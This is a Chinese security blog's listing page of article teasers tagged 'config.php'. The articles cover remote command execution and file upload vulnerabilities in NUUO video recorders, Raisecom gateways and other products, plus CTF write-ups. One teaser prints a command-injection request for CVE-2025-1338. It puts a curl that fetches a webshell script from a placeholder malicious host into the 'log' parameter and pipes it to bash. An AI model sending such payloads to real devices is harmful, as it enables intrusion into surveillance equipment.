config.php | CN-SEC 中文网

安全漏洞

NUUO网络视频录像机 handle_config.php 远程命令执行漏洞(CVE-2025-1338)

内容仅用于学习交流自查使用，由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号Nday Poc及作者不为此承担任何责任，一旦造成后...

05月30日42 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日94 views评论

阅读全文

安全漏洞

NUUO 摄像头handle_site_config.php远程命令执行漏洞附POC

1. NUUO 摄像头漏简介微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发 NUUO 摄像头 2.漏洞描述 NUUO 是NUUO公司的一款小型网络硬盘录像机设备...

02月26日167 views评论

阅读全文

CTF专场

CTFshow 萌新题

本文作者:无名安全团队-火之高兴WEB-1<html><head> <title>ctf.show萌新计划web1</title> <...

12月18日23 views评论

阅读全文

代码审计

发货100cms存在SSRF漏洞分析

厂商官网：https://www.fahuo100.cn/ 下载最新版本即可。影响版本：v1.1_build20240803 漏洞分析：涉及到的文件：admin/config.php...

12月02日20 views评论

阅读全文

安全漏洞

瑞斯康达智能网关list_base_config.php接口存在任意文件上传漏洞附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使...

08月19日132 views评论

阅读全文

安全漏洞

康达vpn-list_base_config.php存在命令执行漏洞

简介网络设备是指用于连接、管理、监控和优化计算机网络中的通信和数据传输的硬件设备。这些设备包括路由器、交换机、防火墙、访问点等，它们共同协作，以确保网络的高效、安全和稳定运行。网络设备的主要功能是实现...

08月19日51 views评论

阅读全文

安全漏洞

康达vpn-list_base_config.php存在命令执行漏洞

08月19日72 views评论

阅读全文

安全博客

PHP 写配置文件经典问题

题目代码如下<?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_...

08月18日10 views评论

阅读全文

2019 fireshell web Vice

题目所给源码<?php //require_once 'config.php'; class SHITS{ private $url; private $method; private $add...

08月17日安全博客15 views评论

阅读全文

安全漏洞

【HW-day】某某康达vpn list_base_config 远程命令执行漏洞【附poc】

免责声明：本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动，若利用本文提供的内容或工具造成任何直接或间接的后果及损失，均由使用者本人负责，所产生的一切不良后果均与文章作者及本账...

08月16日53 views评论

阅读全文

安全漏洞

Raisecom智能网关 list_base_config 远程命令执行漏洞【附poc】

fofa body="oForm.user_name.value" 资产页面一、漏洞简述 Raisecom智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络...

07月29日415 views评论

阅读全文

在线咨询

微信